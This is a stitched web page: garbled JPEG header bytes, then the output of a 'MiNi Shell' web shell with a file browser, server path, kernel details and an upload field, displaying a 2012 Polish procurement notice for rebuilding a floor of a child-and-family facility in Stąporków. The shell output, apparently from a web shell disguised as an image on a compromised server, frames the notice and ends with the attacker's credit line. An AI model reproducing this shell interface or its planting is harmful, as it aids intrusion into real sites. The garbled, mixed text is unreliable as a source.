JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120730/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120730/164639-N-2012.html

<p class="kh_header"><b>Końskie: Przebudowa i zmiana sposobu użytkowania I-go piętra z pomieszczeń internatu na pomieszczenia Środowiskowego Domu Samopomocy w budynku Wielofunkcyjnej Placówki Pomocy Dziecku i Rodzinie 
w Stąporkowie ul. Staszica 6</b><br>
<b>Numer ogłoszenia: 164639 - 2012; data zamieszczenia: 30.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Konecki , ul. Staszica 2, 26-200 Końskie, woj. świętokrzyskie, tel. 0-41 372 41 34, faks 0-41 372 83 20.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa i zmiana sposobu użytkowania I-go piętra z pomieszczeń internatu na pomieszczenia Środowiskowego Domu Samopomocy w budynku Wielofunkcyjnej Placówki Pomocy Dziecku i Rodzinie 
w Stąporkowie ul. Staszica 6.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przebudowa ze zmianą sposobu użytkowania I-go piętra z pomieszczeń internatu na pomieszczenia Środowiskowego Domu Samopomocy w budynku Wielofunkcyjnej Placówki Pomocy Dziecku                              i Rodzinie w Stąporkowie ul. Staszica 2.
Lokalizacja inwestycji - ul. Staszica 6, 26-220 Stąporków, dz. nr 3717/5.
Opis przedmiotu zamówienia. 
1. Przedmiotem zamówienia jest przebudowa ze zmianą sposobu użytkowania I-go piętra wielofunkcyjnej placówki pomocy dziecku i rodzinie.
	Przedmiot zamówienia obejmuje następujące części:
 Etap I:
- Roboty budowlane
Kod i nazwa zamówienia według Wspólnego Słownika Zamówień CPV:
45110000-1 Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne
45111200-0 Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne
45262300-4 Betonowanie
45320000-6 Roboty izolacyjne
45450000-6 Roboty budowlane wykończeniowe, pozostałe
45261210-9 Wykonywanie pokryć dachowych
45321000-3 Izolacja cieplna
45410000-4 Tynkowanie
45420000-7 Roboty w zakresie zakładania stolarki budowlanej oraz roboty ciesielskie
45430000-0 Pokrywanie podłóg i ścian
45442100-8 Roboty malarskie

- Instalacje sanitarne
Kod i nazwa zamówienia według Wspólnego Słownika Zamówień CPV:
45330000-9 Roboty instalacyjne wodno-kanalizacyjne i sanitarne
45331100-7 Instalowanie centralnego ogrzewania
45232460-4 Roboty sanitarne

- Instalacje elektryczne wewnętrzne
Kod i nazwa zamówienia według Wspólnego Słownika Zamówień CPV:
45310000-3 Roboty instalacyjne elektryczne

Etap II:
- Roboty budowlane
Kod i nazwa zamówienia według Wspólnego Słownika Zamówień CPV:
45450000-6 Roboty budowlane wykończeniowe, pozostałe
45321000-3 Izolacja cieplna
45410000-4 Tynkowanie
45420000-7 Roboty w zakresie zakładania stolarki budowlanej oraz roboty ciesielskie
45430000-0 Pokrywanie podłóg i ścian
45442100-8 Roboty malarskie

- Instalowanie urządzeń dźwigowych
Kod i nazwa zamówienia według Wspólnego Słownika Zamówień CPV:
45350000-5 Instalacje mechaniczne

Zakres robót budowlanych
Inwestycja polega na przebudowie i zmianie sposobu użytkowania I - piętra z pomieszczeń internatu na pomieszczenia powiatowego środowiskowego domu samopomocy w budynku wielofunkcyjnej placówki pomocy dziecku i rodzinie. 
Zadanie inwestycyjne swoim zakresem obejmuje przebudowę oraz remont części istniejącego budynku. Przewidziano przebudowę dwóch klatek schodowych, budowę szybu windowego wewnętrznego wraz z montażem urządzenia dźwigowego, remont pomieszczeń wewnątrz budynku, jak również wymianę oraz rozbudowę i przebudowę instalacji sanitarnych oraz elektrycznych. 
Z uwagi na specyfikę robót remontowych istnieje możliwość wystąpienia w trakcie prowadzenia robót konieczności wykonania robót budowlanych, których nie można było stwierdzić na etapie opracowywania dokumentacji projektowej. 
	Planowana inwestycja ma na celu powstanie ośrodka, mającego za zadanie budowanie sieci oparcia społecznego, przygotowanie do życia w społeczeństwie i funkcjonowania w środowisku:
- osób przewlekle psychicznie chorych
- niepełnosprawnych intelektualnie.
	Placówka będzie prowadzić zajęcia dzienne z pensjonariuszami.
Po przeprowadzeniu inwestycji do dyspozycji personelu i pensjonariuszy placówki przewiduje się:
- świetlicę
- kawiarenkę
- pomieszczenie sportowo - rekreacyjne
- pracownię krawiecko-gobeliniarską
- pracownię rzeźbiarsko - ceramiczną
- pracownię artystyczną
- pracownię komputerową
- WC damskie i WC Męskie pensjonariuszy
- łazienka z pralnią spełniająca jednocześnie standardy WC dla niepełnosprawnych
- WC dla personelu
- archiwum
- szatnię dla pensjonariuszy
- magazyn
- pokój kierownika
-pokój biurowy
- pokój psychologa,wychowawców
	Dodatkowo na poziomie pierwszego piętra projektuje się miejsca całodobowe z pełnym węzłem sanitarnym                     i zapleczem kuchennym o powierzchni łącznej 105,6 m2.
	Dostęp do pomieszczeń na I piętrze dla osób niepełnosprawnych za pomocą windy o napędzie hydraulicznym. Przed głównym wejściem przewidziano podjazd dla niepełnosprawnych.
	Całość budynku jest przewidziana do przebywania max. 50 osób.	

Dane liczbowe:
Powierzchnia zabudowy................	644,7m2 
Powierzchnia użytkowa.................	581,2m2
Kubatura  budynku brutto.............     2101 m3
	Wysokość kondygnacji części piętrowej = 2,5m 
	W ramach inwestycji przewiduje się również dodatkowe utwardzenie części działki budowlanej (kostka betonowa gr. 6cm na podbudowie) wg rysunku Szkic sytuacyjny.
Przewiduje się podział całego zadania inwestycyjnego na dwa etapy wykonawcze:
-	ETAP I
Przewiduje się w tym etapie wykonanie: 
a)	robót rozbiórkowych wewnątrz budynku,
b)	stanu zerowego - dotyczy przebudowy klatek schodowych i budowy szybu windowego
c)	stanu surowego - dotyczy szybu windowego oraz przebudowy wewnętrznych klatek schodowych), 
d)	docieplenia ścian zewnętrznych wraz z wymianą stolarki okiennej i drzwiowej zewnętrznej oraz parapetów zewnętrznych, 
e)	przebudowy oraz rozbudowy wewnętrznych instalacji sanitarnych: zakres robót obejmuje demontaż będących w złym stanie technicznym elementów instalacji oraz wykonanie nowych instalacji wraz z włączeniem do instalacji na parterze budynku. Przebudowa instalacji c.w.u. obejmuje zmianę źródła zasilania z istniejących na kondygnacji parteru elektrycznych podgrzewaczy na nowe podgrzewacze o większej wydajności - szczegóły rozwiązań instalacji wg. projektu budowlanego
f)	przebudowy oraz rozbudowy wewnętrznych instalacji elektrycznych: zakres robót obejmuje demontaż będących w złym stanie technicznym elementów instalacji oraz wykonanie nowych instalacji (w tym instalacji niskoprądowych) wraz z włączeniem do instalacji na parterze budynku - szczegóły rozwiązań instalacji                   wg. projektu budowlanego
g)	robót budowlanych na zewnątrz budynku tj. schodów zewnętrznych, podjazdu dla niepełnosprawnych, opaski wokół budynku
h)	wywozu i utylizacji gruzu powstałego podczas prowadzenia w.w. robót budowlanych
-	ETAP II  
Przewiduje się w tym etapie wykonanie: 
a)	robót wykończeniowych wewnątrz budynku obejmujących: tynki wewnętrzne, posadzki, stolarkę drzwiową wewnętrzną, podokienniki wewnętrzne, roboty malarskie, okładziny ścian z płyt gips.-kart.
b)	montaż kompletnego urządzenia dźwigowego w szybie windowym

UWAGI OGÓLNE
Przed złożeniem oferty Wykonawca zobowiązany jest do zapoznania się z dokumentacją projektową zamieszczoną na stronie internetowej Zamawiającego lub w siedzibie Zamawiającego, która stanowi integralną część SIWZ. 
Wykonawca zobowiązany jest do wyposażenia części budynku objętej zakresem inwestycji w urządzenia gaśnicze, piktogramy oraz do opracowania na własny koszt scenariusza oraz instrukcji pożarowej. 
Materiały budowlane muszą odpowiadać co do jakości wymaganiom określonym ustawą z dnia 16 kwietnia 2004 r.              o wyrobach budowlanych (Dz. U. nr 92, poz. 881) z późniejszymi zmianami oraz wymaganiom określonym                             w dokumentacji projektowej, stanowiącej załącznik  SIWZ.

	Szczegółowy opis przedmiotu zamówienia zawarty jest w:
projekcie budowlanym, specyfikacji technicznej wykonania i odbioru robót, przedmiarach robót stanowiącym załącznik Nr 1 do SIWZ, 
Ilekroć w projekcie budowlanym, specyfikacji technicznej wykonania i odbioru robót, przedmiarach robót, przywołany jest konkretny materiał, wyrób lub urządzenie danej firmy należy to traktować jako wytyczną techniczno-jakościową i dopuszcza się zastosowanie innych materiałów, wyrobów lub urządzenia - równoważnych o parametrach nie gorszych niż przywołane. Dotyczy to wszystkich branż  wymienionych w dokumentacji projektowej.
Zamawiający z uwagi na specyfikę robót remontowych zaleca przeprowadzenie wizji lokalnej miejsca, gdzie będą prowadzone roboty budowlane objęte niniejszym zamówieniem. W celu ustalenia szczegółów należy kontaktować się                    z panią Moniką Krawczyk - Dyrektorem Wielofunkcyjnej Placówki Pomocy Dziecku i Rodzinie w Stąporkowie                       tel. 41 374-0005..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.00.00-1, 45.11.12.00-0, 45.26.23.00-4, 45.32.00.00-6, 45.45.00.00-6, 45.26.12.10-9, 45.32.10.00-3, 45.41.00.00-4, 45.42.00.00-7, 45.43.00.00-0, 45.44.21.00-8, 45.33.00.00-9, 45.33.11.00-7, 45.23.24.60-4, 45.31.00.00-3, 45.35.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca jest zobowiązany wnieść wadium w wysokości: 30 000,00 zł (słownie: trzydzieści tysięcy złotych).
	Wadium może być wniesione w jednej lub kilku następujących formach:
a)	pieniądzu,
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym,                           że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)	gwarancjach bankowych,
d)	gwarancjach ubezpieczeniowych,
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 29 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275).
	Wadium wnoszone w pieniądzu należy wpłacić przelewem na następujący rachunek bankowy zamawiającego: Nr.: 10 1240 5006 1111 0010 4014 9944 z adnotacją: wadium - przebudowa i zmiana sposobu użytkowania budynku, Stąporków, ul. Staszica 6. Zaleca się dołączenie do oferty kserokopii dokumentu potwierdzającego dokonanie przelewu.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ww. warunek za spełniony, jeżeli wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał zgodnie z zasadami sztuki budowlanej i prawidłowo ukończył 2 roboty budowlane, każda:
-	polegająca na budowie i/lub remoncie obiektu kubaturowego
-	o wartości nie mniejszej niż 700 000,00 zł brutto (słownie: siedemset tysięcy złotych).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ww. warunek za spełniony jeżeli wykonawca wykaże, że dysponuje lub będzie dysponował:
a)	kierownikiem budowy, który posiada uprawnienia do kierowania robotami budowlanymi                               w specjalności konstrukcyjno-budowlanej bez ograniczeń oraz posiada doświadczenie                          w pełnieniu funkcji kierownika budowy przy realizacji 2 robót budowlanych, z których  każda polegała na budowie obiektu kubaturowego o powierzchni zabudowy co najmniej 400 m2
b)	 kierownikiem robót, który posiada uprawnienia do kierowania robotami instalacyjno-inżynieryjnymi                    w zakresie instalacji elektrycznych bez ograniczeń, 
c)	kierownikiem robót, który posiada uprawnienia do kierowania robotami instalacyjno-inżynieryjnymi                         w zakresie instalacji sanitarnych bez ograniczeń.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ww. za spełniony, jeżeli wykonawca wykaże, że znajduje się w sytuacji ekonomicznej                         i finansowej zapewniającej wykonanie zamówienia, tj. posiada środki finansowe lub zdolność kredytową                           w wysokości nie mniejszej niż 600 000,00 zł (słownie: sześćset tysięcy złotych).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- Oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy - sporządzone według wzoru stanowiącego Załącznik Nr 3 do SIWZ;
-Jeżeli wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia innych podmiotów, zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie takich podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia;
-W przypadku wnoszenia oferty przez wykonawców występujących wspólnie, wykonawcy muszą złożyć oświadczenia i dokumenty, o których mowa w Rozdziale 5 SIWZ, z tym, że dokumenty wymienione w pkt 5.1.6 - 5.1.7 (i odpowiednio pkt 5.4) SIWZ należy złożyć dla każdego wykonawcy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.konecki.wrota-swietokrzyskie.pl/web/quest/pcpr<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie w Końskich,   ul. Stanisława Staszica 2, 26-200 Końskie pok. Nr 4..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.08.2012 godzina 10:00, miejsce: Powiatowe Centrum Pomocy Rodzinie w Końskich,   ul. Stanisława Staszica 2, 26-200 Końskie pok. Nr 4..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com